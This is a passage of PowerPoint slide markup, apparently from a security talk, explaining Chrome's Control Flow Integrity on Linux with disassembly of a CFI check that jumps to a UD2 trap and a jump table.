            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why did it land on the UD2 instruction?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171991" y="2689452"/>
            <a:ext cx="9498228" cy="1520598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890109525"/>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951304" y="2269866"/>
            <a:ext cx="5175380" cy="2698926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chrome’s Control Flow Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="control flow integrityì ëí ì´ë¯¸ì§ ê²ìê²°ê³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849" y="1095730"/>
            <a:ext cx="6402137" cy="4773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9416466"/>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Chrome’s Control Flow Integrity</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It turns out that Chrome implemented a CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Only on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(for now)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Other operating systems will be supported soon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662057498"/>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Chrome’s CFI</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410547" y="1626255"/>
            <a:ext cx="10657500" cy="5047536"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718457" y="1626255"/>
            <a:ext cx="10254344" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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0000000004C040A4                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rdi</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r12+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>48h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040A9                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rax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rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040AC                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rcx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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040B0                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r14,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> loc_19C17F0</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0000000004C040B7                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rax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rcx</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0000000004C040BA                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub</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rax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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r14</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0000000004C040BD                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ror</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rax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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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0000000004C040C1                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</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rax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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>104h</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0000000004C040C7                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      loc_4C041C1</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0000000004C040CD                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</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rcx</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0000000004C041C1 loc_4C041C1</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AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; CODE XREF: sub_4C03B40+7C↑j</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0000000004C041C1                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ud2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FBDE2D"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FBDE2D"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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00000000019C17F0 loc_19C17F0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="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a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; CODE XREF: sub_4C03B40+7C↑j</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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C17F0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="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jmp</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loc_4B30FE0</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>19C17F8</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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      loc_4B31AC0</a:t>
            </a:r>
          </a:p>
          <a:p>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00000000019C1800 </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jmp</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loc_4B390E0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C1808 </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jmp</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loc_4B19720</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C1810 </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jmp</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loc_4B194F0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C1818 </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jmp</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loc_4B34B50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96309957"/>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Key observation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410547" y="1626255"/>
            <a:ext cx="10657500" cy="5047536"/>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TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718457" y="1626255"/>
            <a:ext cx="10254344" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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0000000004C040A4                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rdi</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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r12+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>48h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040A9                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rax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rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040AC                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rcx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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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0000000004C040B0                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r14,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> loc_19C17F0</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0000000004C040B7                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</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rax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rcx</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0000000004C040BA                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub</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rax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FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r14</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0000000004C040BD                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ror</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rax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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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0000000004C040C1                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</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rax</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D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>104h</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0000000004C040C7                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      loc_4C041C1</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0000000004C040CD                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</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rcx</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0000000004C041C1 loc_4C041C1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; CODE XREF: sub_4C03B40+7C↑j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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0000000004C041C1                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ud2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FBDE2D"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FBDE2D"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
